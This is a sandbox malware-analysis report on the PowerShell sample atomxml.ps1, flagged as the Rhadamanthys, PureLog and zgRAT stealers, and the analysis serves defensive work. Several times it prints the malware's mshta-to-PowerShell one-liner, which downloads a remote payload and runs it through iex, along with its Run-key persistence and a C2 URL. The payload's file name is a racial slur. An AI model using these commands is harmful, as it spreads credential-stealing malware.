Edit tour

Windows Analysis Report
atomxml.ps1

Overview

General Information

Sample name:	atomxml.ps1
Analysis ID:	1585909
MD5:	b21f207101abbbb84b30dfffb68c53e5
SHA1:	7d93785d0f1e1eed991b1b8209acec8abbb5cedb
SHA256:	d82cadfdd5c7611fc25978f7c500de4bb32a11ef202bc972c83a0815e625da66
Tags:	bookingps1Spam-ITAuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, RHADAMANTHYS, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RHADAMANTHYS Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Deletes itself after installation

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Powershell In Registry Run Keys

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 4092 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

RegSvcs.exe (PID: 7968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 5808 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

RegSvcs.exe (PID: 8000 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 8096 cmdline: dw20.exe -x -s 912 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

RegSvcs.exe (PID: 8016 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 8168 cmdline: dw20.exe -x -s 916 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 8144 cmdline: dw20.exe -x -s 784 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 8072 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 5100 cmdline: dw20.exe -x -s 788 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

mshta.exe (PID: 6672 cmdline: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 2936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7644 cmdline: "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

mshta.exe (PID: 6500 cmdline: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 5312 cmdline: "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000011.00000003.2382423562.0000000003180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000011.00000002.2383562069.00000000036E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000010.00000003.2375768763.0000000003450000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000002.2380719391.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2426889440.00000000037E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7960	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7968	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: fontdrvhost.exe PID: 5808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.powershell.exe.26c39780000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.powershell.exe.26c39780000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.powershell.exe.26c39780000.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.powershell.exe.26c39780000.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x46d47:$s1: file:/// 0x46c31:$s2: {11111-22222-10009-11112} 0x46cd7:$s3: {11111-22222-50001-00000} 0x4481e:$s4: get_Module 0x44c66:$s5: Reverse 0x43fea:$s6: BlockCopy 0x43fda:$s7: ReadByte 0x46d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
16.3.fontdrvhost.exe.59a0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6672, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, ProcessId: 2936, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6672, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, ProcessId: 2936, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", ProcessId: 7272, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(epd[2])[epd[0]](epd[1], 0, true);close();ncj=new ActiveXObject('Scripting.FileSystemObject');ncj.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-126

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(epd[2])[epd[0]](epd[1], 0, true);close();ncj=new ActiveXObject('Scripting.FileSystemObject');ncj.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-126

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", ProcessId: 7272, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:19.139942+0100	2047905	1	A Network Trojan was detected	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2047905	1	A Network Trojan was detected	192.168.2.4	49956	142.250.185.225	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:19.139942+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49956	142.250.185.225	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:17.966589+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49845	142.250.185.225	443	TCP
2025-01-08T13:55:19.139942+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:20.354888+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49867	185.166.143.48	443	TCP
2025-01-08T13:55:31.884881+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49945	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49956	142.250.185.225	443	TCP
2025-01-08T13:55:34.179749+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49964	185.166.143.48	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2382396689.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49964 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C7783C GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,_wcsnicmp,_snwprintf,lstrcpyW,

5_2_05C7783C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_f367fb30-4a6d-4729-a18a-0a24b90a8c50\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_598857dc-8512-453a-af65-151ce81ace18\

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:49956 -> 142.250.185.225:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf

Source: Joe Sandbox View

IP Address: 185.166.143.48 185.166.143.48

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49845 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49867 -> 185.166.143.48:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49945 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49956 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49956 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49964 -> 185.166.143.48:443

Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
